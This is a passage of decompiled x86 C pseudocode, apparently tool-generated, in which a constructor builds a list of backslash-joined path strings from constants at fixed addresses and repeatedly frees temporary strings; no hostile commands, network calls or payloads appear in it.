                          				signed int _t956;
                          				void* _t958;
                          				void* _t959;
                          				short* _t960;
                          				char _t961;
                          				signed int _t963;
                          				signed int _t965;
                          				signed int _t967;
                          				signed int _t969;
                          				void* _t971;
                          				void* _t972;
                          				short* _t973;
                          				char _t974;
                          				signed int _t976;
                          				signed int _t978;
                          				signed int _t980;
                          				signed int _t982;
                          				void* _t984;
                          				void* _t985;
                          				short* _t986;
                          				char _t987;
                          				signed int _t989;
                          				signed int _t991;
                          				signed int _t993;
                          				signed int _t995;
                          				void* _t996;
                          				void* _t997;
                          				void* _t998;
                          				short* _t999;
                          				signed int _t1001;
                          				signed int _t1003;
                          				signed int _t1005;
                          				signed int _t1007;
                          				char* _t1019;
                          				void* _t1020;
                          				void* _t1164;
                          				intOrPtr* _t1166;
                          				intOrPtr _t1174;
                          				intOrPtr _t1180;
                          				intOrPtr _t1186;
                          				intOrPtr _t1190;
                          				intOrPtr _t1194;
                          				intOrPtr _t1198;
                          				intOrPtr _t1204;
                          				intOrPtr _t1208;
                          				intOrPtr _t1212;
                          				intOrPtr _t1215;
                          				intOrPtr _t1218;
                          				intOrPtr _t1221;
                          				intOrPtr _t1224;
                          				intOrPtr _t1227;
                          				intOrPtr _t1230;
                          				intOrPtr _t1238;
                          				short* _t1244;
                          				short* _t1250;
                          				short* _t1256;
                          				short* _t1262;
                          				short* _t1268;
                          				intOrPtr _t1274;
                          				short* _t1283;
                          				void* _t1311;
                          				intOrPtr _t1355;
                          				intOrPtr _t1360;
                          				intOrPtr _t1365;
                          				intOrPtr _t1370;
                          				intOrPtr _t1375;
                          				intOrPtr* _t1387;
                          				intOrPtr* _t1391;
                          				void* _t1404;
                          				char _t1405;
                          				void* _t1406;
                          				signed int _t1407;
                          				void* _t1408;
                          				intOrPtr* _t1410;
                          				void* _t1411;
                          				void* _t1412;
                          				void* _t1413;
                          				void* _t1414;
                          				void* _t1415;
                          				void* _t1416;
                          				void* _t1417;
                          				void* _t1418;
                          				void* _t1419;
                          				void* _t1420;
                          				void* _t1421;
                          				void* _t1512;
                          
                          				_t1311 = __edx;
                          				_t1164 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x13672a7);
                          				_push( *[fs:0x0]);
                          				_t806 =  *0x13a4018; // 0x39cca9f6
                          				_t807 = _t806 ^ _t1407;
                          				_v20 = _t807;
                          				_push(__edi);
                          				_push(_t807);
                          				 *[fs:0x0] =  &_v16;
                          				_t1391 = __ecx;
                          				_v192 = __ecx;
                          				_v248 = __ecx;
                          				_v244 = __ecx;
                          				_push(5);
                          				_t1410 = _t1408 - 0xf8;
                          				_v8 = 0;
                          				_t1166 = _t1410;
                          				 *_t1166 = 0;
                          				 *((intOrPtr*)(_t1166 + 4)) = 0;
                          				_t1423 = _a8;
                          				if(_a8 != 0) {
                          					asm("lock inc dword [eax+0x4]");
                          				}
                          				 *_t1166 = _a4;
                          				 *((intOrPtr*)(_t1166 + 4)) = _a8;
                          				E01303AA0(_t1391, _t1311);
                          				 *_t1391 = 0x1396b90;
                          				 *((intOrPtr*)(_t1391 + 0x18)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x1c)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x20)) = 0;
                          				_t1387 = _t1391 + 0x24;
                          				 *_t1387 = 0;
                          				 *((intOrPtr*)(_t1387 + 4)) = 0;
                          				 *((intOrPtr*)(_t1387 + 8)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x30)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x34)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x38)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x3c)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x40)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x44)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x48)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x4c)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x50)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x64)) = 0;
                          				 *(_t1391 + 0x68) = 7;
                          				 *((short*)(_t1391 + 0x54)) = 0;
                          				 *((intOrPtr*)(_t1391 + 0x7c)) = 0;
                          				 *(_t1391 + 0x80) = 7;
                          				 *((short*)(_t1391 + 0x6c)) = 0;
                          				_v8 = 8;
                          				_t1392 = E012F93F0( &_v164, 0x13a5d6c, _t1387, _t1423);
                          				_v8 = 9;
                          				_t815 = E012F93F0( &_v140, 0x13a5bec, _t1387, _t1423);
                          				_v8 = 0xa;
                          				_t816 = E0130A920(_t1164,  &_v188, _t815, _t1387);
                          				_v8 = 0xb;
                          				_t817 = E012FC470( &_v216, _t816, _t814);
                          				_v8 = 0xc;
                          				_t818 = E012F8470( &_v272, _t817, "\\");
                          				_t1411 = _t1410 + 8;
                          				_v8 = 0xd;
                          				_t1174 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1174 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t818);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1392, _t1174);
                          				} else {
                          					 *((intOrPtr*)(_t1174 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1174 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t818 + 0x10)) = 0;
                          					 *(_t818 + 0x14) = 7;
                          					 *_t818 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t820 = _v252;
                          				if(_t820 >= 8) {
                          					_push(2 + _t820 * 2);
                          					E012F56A0(_t1164, _t1387, _v272);
                          					_t1411 = _t1411 + 8;
                          				}
                          				_v256 = 0;
                          				_v272 = 0;
                          				_t822 = _v196;
                          				_v252 = 7;
                          				if(_t822 >= 8) {
                          					_push(2 + _t822 * 2);
                          					E012F56A0(_t1164, _t1387, _v216);
                          					_t1411 = _t1411 + 8;
                          				}
                          				_v200 = 0;
                          				_v216 = 0;
                          				_t824 = _v168;
                          				_v196 = 7;
                          				if(_t824 >= 8) {
                          					_push(2 + _t824 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1411 = _t1411 + 8;
                          				}
                          				_v172 = 0;
                          				_v188 = 0;
                          				_t826 = _v120;
                          				_v168 = 7;
                          				if(_t826 >= 8) {
                          					_push(2 + _t826 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1411 = _t1411 + 8;
                          				}
                          				_v8 = 8;
                          				_v140 = 0;
                          				_t828 = _v144;
                          				_v124 = 0;
                          				_v120 = 7;
                          				_t1429 = _t828 - 8;
                          				if(_t828 >= 8) {
                          					_push(2 + _t828 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1411 = _t1411 + 8;
                          				}
                          				_t1393 = E012F93F0( &_v164, 0x13a5e14, _t1387, _t1429);
                          				_v8 = 0xe;
                          				_t830 = E012F93F0( &_v216, 0x13a5bec, _t1387, _t1429);
                          				_v8 = 0xf;
                          				_t831 = E0130A920(_t1164,  &_v188, _t830, _t1387);
                          				_v8 = 0x10;
                          				_t832 = E012FC470( &_v140, _t831, _t829);
                          				_t1412 = _t1411 + 4;
                          				_v8 = 0x11;
                          				_t1180 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1180 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t832);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1393, _t1180);
                          				} else {
                          					 *((intOrPtr*)(_t1180 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1180 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t832 + 0x10)) = 0;
                          					 *(_t832 + 0x14) = 7;
                          					 *_t832 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t834 = _v120;
                          				if(_t834 >= 8) {
                          					_push(2 + _t834 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1412 = _t1412 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t836 = _v168;
                          				_v120 = 7;
                          				if(_t836 >= 8) {
                          					_push(2 + _t836 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1412 = _t1412 + 8;
                          				}
                          				_v172 = 0;
                          				_v188 = 0;
                          				_t838 = _v196;
                          				_v168 = 7;
                          				if(_t838 >= 8) {
                          					_push(2 + _t838 * 2);
                          					E012F56A0(_t1164, _t1387, _v216);
                          					_t1412 = _t1412 + 8;
                          				}
                          				_v8 = 8;
                          				_v216 = 0;
                          				_t840 = _v144;
                          				_v200 = 0;
                          				_v196 = 7;
                          				_t1434 = _t840 - 8;
                          				if(_t840 >= 8) {
                          					_push(2 + _t840 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1412 = _t1412 + 8;
                          				}
                          				_t1394 = E012F93F0( &_v164, 0x13a5d9c, _t1387, _t1434);
                          				_v8 = 0x12;
                          				_t842 = E012F93F0( &_v216, 0x13a5bec, _t1387, _t1434);
                          				_v8 = 0x13;
                          				_t843 = E0130A920(_t1164,  &_v188, _t842, _t1387);
                          				_v8 = 0x14;
                          				_t844 = E012FC470( &_v140, _t843, _t841);
                          				_t1413 = _t1412 + 4;
                          				_v8 = 0x15;
                          				_t1186 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1186 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t844);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1186);
                          				} else {
                          					 *((intOrPtr*)(_t1186 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1186 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t844 + 0x10)) = 0;
                          					 *(_t844 + 0x14) = 7;
                          					 *_t844 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t846 = _v120;
                          				if(_t846 >= 8) {
                          					_push(2 + _t846 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t848 = _v168;
                          				_v120 = 7;
                          				if(_t848 >= 8) {
                          					_push(2 + _t848 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_v172 = 0;
                          				_v188 = 0;
                          				_t850 = _v196;
                          				_v168 = 7;
                          				if(_t850 >= 8) {
                          					_push(2 + _t850 * 2);
                          					E012F56A0(_t1164, _t1387, _v216);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_v8 = 8;
                          				_v216 = 0;
                          				_t852 = _v144;
                          				_v200 = 0;
                          				_v196 = 7;
                          				_t1439 = _t852 - 8;
                          				if(_t852 >= 8) {
                          					_push(2 + _t852 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_t853 = E012F93F0( &_v164, 0x13a5c34, _t1387, _t1439);
                          				_v8 = 0x16;
                          				_t854 = E0130A920(_t1164,  &_v140, _t853, _t1387);
                          				_v8 = 0x17;
                          				_t1190 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1190 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t854);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1190);
                          				} else {
                          					 *((intOrPtr*)(_t1190 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1190 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t854 + 0x10)) = 0;
                          					 *(_t854 + 0x14) = 7;
                          					 *_t854 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t856 = _v120;
                          				if(_t856 >= 8) {
                          					_push(2 + _t856 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_v8 = 8;
                          				_v140 = 0;
                          				_t858 = _v144;
                          				_v124 = 0;
                          				_v120 = 7;
                          				_t1442 = _t858 - 8;
                          				if(_t858 >= 8) {
                          					_push(2 + _t858 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_t859 = E012F93F0( &_v164, 0x13a5c4c, _t1387, _t1442);
                          				_v8 = 0x18;
                          				_t860 = E0130A920(_t1164,  &_v140, _t859, _t1387); // executed
                          				_v8 = 0x19;
                          				_t1194 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1194 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t860);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1194);
                          				} else {
                          					 *((intOrPtr*)(_t1194 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1194 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t860 + 0x10)) = 0;
                          					 *(_t860 + 0x14) = 7;
                          					 *_t860 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t862 = _v120;
                          				if(_t862 >= 8) {
                          					_push(2 + _t862 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_v8 = 8;
                          				_v140 = 0;
                          				_t864 = _v144;
                          				_v124 = 0;
                          				_v120 = 7;
                          				_t1445 = _t864 - 8;
                          				if(_t864 >= 8) {
                          					_push(2 + _t864 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_t865 = E012F93F0( &_v164, 0x13a5e8c, _t1387, _t1445);
                          				_v8 = 0x1a;
                          				_t866 = E0130A920(_t1164,  &_v140, _t865, _t1387);
                          				_v8 = 0x1b;
                          				_t1198 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1198 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t866);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1198);
                          				} else {
                          					 *((intOrPtr*)(_t1198 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1198 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t866 + 0x10)) = 0;
                          					 *(_t866 + 0x14) = 7;
                          					 *_t866 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t868 = _v120;
                          				if(_t868 >= 8) {
                          					_push(2 + _t868 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_v8 = 8;
                          				_v140 = 0;
                          				_t870 = _v144;
                          				_v124 = 0;
                          				_v120 = 7;
                          				_t1448 = _t870 - 8;
                          				if(_t870 >= 8) {
                          					_push(2 + _t870 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1413 = _t1413 + 8;
                          				}
                          				_t1395 = E012F93F0( &_v164, 0x13a5b2c, _t1387, _t1448);
                          				_v8 = 0x1c;
                          				_t872 = E012F93F0( &_v216, 0x13a5c1c, _t1387, _t1448);
                          				_v8 = 0x1d;
                          				_t873 = E0130A920(_t1164,  &_v188, _t872, _t1387);
                          				_v8 = 0x1e;
                          				_t874 = E012FC470( &_v140, _t873, _t871);
                          				_t1414 = _t1413 + 4;
                          				_v8 = 0x1f;
                          				_t1204 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1204 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t874);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1204);
                          				} else {
                          					 *((intOrPtr*)(_t1204 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1204 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t874 + 0x10)) = 0;
                          					 *(_t874 + 0x14) = 7;
                          					 *_t874 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t876 = _v120;
                          				if(_t876 >= 8) {
                          					_push(2 + _t876 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t878 = _v168;
                          				_v120 = 7;
                          				if(_t878 >= 8) {
                          					_push(2 + _t878 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_v172 = 0;
                          				_v188 = 0;
                          				_t880 = _v196;
                          				_v168 = 7;
                          				if(_t880 >= 8) {
                          					_push(2 + _t880 * 2);
                          					E012F56A0(_t1164, _t1387, _v216);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_v8 = 8;
                          				_v216 = 0;
                          				_t882 = _v144;
                          				_v200 = 0;
                          				_v196 = 7;
                          				_t1453 = _t882 - 8;
                          				if(_t882 >= 8) {
                          					_push(2 + _t882 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t883 = E012F93F0( &_v164, 0x13a5f34, _t1387, _t1453);
                          				_v8 = 0x20;
                          				_t884 = E0130A920(_t1164,  &_v140, _t883, _t1387);
                          				_v8 = 0x21;
                          				_t1208 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1208 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t884);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1208);
                          				} else {
                          					 *((intOrPtr*)(_t1208 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1208 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t884 + 0x10)) = 0;
                          					 *(_t884 + 0x14) = 7;
                          					 *_t884 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t886 = _v120;
                          				if(_t886 >= 8) {
                          					_push(2 + _t886 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_v8 = 8;
                          				_v140 = 0;
                          				_t888 = _v144;
                          				_v124 = 0;
                          				_v120 = 7;
                          				_t1456 = _t888 - 8;
                          				if(_t888 >= 8) {
                          					_push(2 + _t888 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t889 = E012F93F0( &_v164, 0x13a606c, _t1387, _t1456);
                          				_v8 = 0x22;
                          				_t890 = E0130A920(_t1164,  &_v140, _t889, _t1387);
                          				_v8 = 0x23;
                          				_t1212 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1212 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t890);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1212);
                          				} else {
                          					 *((intOrPtr*)(_t1212 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1212 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t890 + 0x10)) = 0;
                          					 *(_t890 + 0x14) = 7;
                          					 *_t890 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t892 = _v120;
                          				if(_t892 >= 8) {
                          					_push(2 + _t892 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_v8 = 8;
                          				_v140 = 0;
                          				_t894 = _v144;
                          				_v124 = 0;
                          				_v120 = 7;
                          				_t1459 = _t894 - 8;
                          				if(_t894 >= 8) {
                          					_push(2 + _t894 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t895 = E012F93F0( &_v164, 0x13a5a6c, _t1387, _t1459);
                          				_v8 = 0x24;
                          				_t1215 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1215 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t895);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1215);
                          				} else {
                          					 *((intOrPtr*)(_t1215 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1215 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t895 + 0x10)) = 0;
                          					 *(_t895 + 0x14) = 7;
                          					 *_t895 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_v8 = 8;
                          				_t897 = _v144;
                          				_t1461 = _t897 - 8;
                          				if(_t897 >= 8) {
                          					_push(2 + _t897 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t898 = E012F93F0( &_v164, 0x13a5dcc, _t1387, _t1461);
                          				_v8 = 0x25;
                          				_t1218 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1218 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t898);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1218);
                          				} else {
                          					 *((intOrPtr*)(_t1218 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1218 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t898 + 0x10)) = 0;
                          					 *(_t898 + 0x14) = 7;
                          					 *_t898 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_v8 = 8;
                          				_t900 = _v144;
                          				_t1463 = _t900 - 8;
                          				if(_t900 >= 8) {
                          					_push(2 + _t900 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t901 = E012F93F0( &_v164, 0x13a5ea4, _t1387, _t1463);
                          				_v8 = 0x26;
                          				_t1221 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1221 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t901);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1221);
                          				} else {
                          					 *((intOrPtr*)(_t1221 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1221 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t901 + 0x10)) = 0;
                          					 *(_t901 + 0x14) = 7;
                          					 *_t901 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_v8 = 8;
                          				_t903 = _v144;
                          				_t1465 = _t903 - 8;
                          				if(_t903 >= 8) {
                          					_push(2 + _t903 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t904 = E012F93F0( &_v164, 0x13a5d3c, _t1387, _t1465);
                          				_v8 = 0x27;
                          				_t1224 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1224 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t904);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1224);
                          				} else {
                          					 *((intOrPtr*)(_t1224 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1224 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t904 + 0x10)) = 0;
                          					 *(_t904 + 0x14) = 7;
                          					 *_t904 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_v8 = 8;
                          				_t906 = _v144;
                          				_t1467 = _t906 - 8;
                          				if(_t906 >= 8) {
                          					_push(2 + _t906 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t907 = E012F93F0( &_v164, 0x13a5f34, _t1387, _t1467);
                          				_v8 = 0x28;
                          				_t1227 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1227 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t907);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1227);
                          				} else {
                          					 *((intOrPtr*)(_t1227 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1227 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t907 + 0x10)) = 0;
                          					 *(_t907 + 0x14) = 7;
                          					 *_t907 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_v8 = 8;
                          				_t909 = _v144;
                          				_t1469 = _t909 - 8;
                          				if(_t909 >= 8) {
                          					_push(2 + _t909 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t910 = E012F93F0( &_v164, 0x13a5db4, _t1387, _t1469);
                          				_v8 = 0x29;
                          				_t1230 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1230 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t910);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1230);
                          				} else {
                          					 *((intOrPtr*)(_t1230 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1230 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t910 + 0x10)) = 0;
                          					 *(_t910 + 0x14) = 7;
                          					 *_t910 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_v8 = 8;
                          				_t912 = _v144;
                          				_t1471 = _t912 - 8;
                          				if(_t912 >= 8) {
                          					_push(2 + _t912 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1414 = _t1414 + 8;
                          				}
                          				_t1396 = E012F93F0( &_v240, 0x13a5d6c, _t1387, _t1471);
                          				_v8 = 0x2a;
                          				_t914 = E012F93F0( &_v164, 0x13a5bec, _t1387, _t1471);
                          				_v8 = 0x2b;
                          				_t915 = E0130A920(_t1164,  &_v272, _t914, _t1387);
                          				_v8 = 0x2c;
                          				_t916 = E012F8470( &_v216, _t915, "\\");
                          				_v8 = 0x2d;
                          				_t917 = E012FC470( &_v188, _t916, _t913);
                          				_v8 = 0x2e;
                          				_t918 = E012F8470( &_v140, _t917, "\\");
                          				_t1415 = _t1414 + 0xc;
                          				_v8 = 0x2f;
                          				_t1238 =  *((intOrPtr*)(_t1387 + 4));
                          				if(_t1238 ==  *((intOrPtr*)(_t1387 + 8))) {
                          					_push(_t918);
                          					E012F54C0(_t1164, _t1387, _t1387, _t1396, _t1238);
                          				} else {
                          					 *((intOrPtr*)(_t1238 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1238 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t918 + 0x10)) = 0;
                          					 *(_t918 + 0x14) = 7;
                          					 *_t918 = 0;
                          					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
                          				}
                          				_t920 = _v120;
                          				if(_t920 >= 8) {
                          					_push(2 + _t920 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1415 = _t1415 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t922 = _v168;
                          				_v120 = 7;
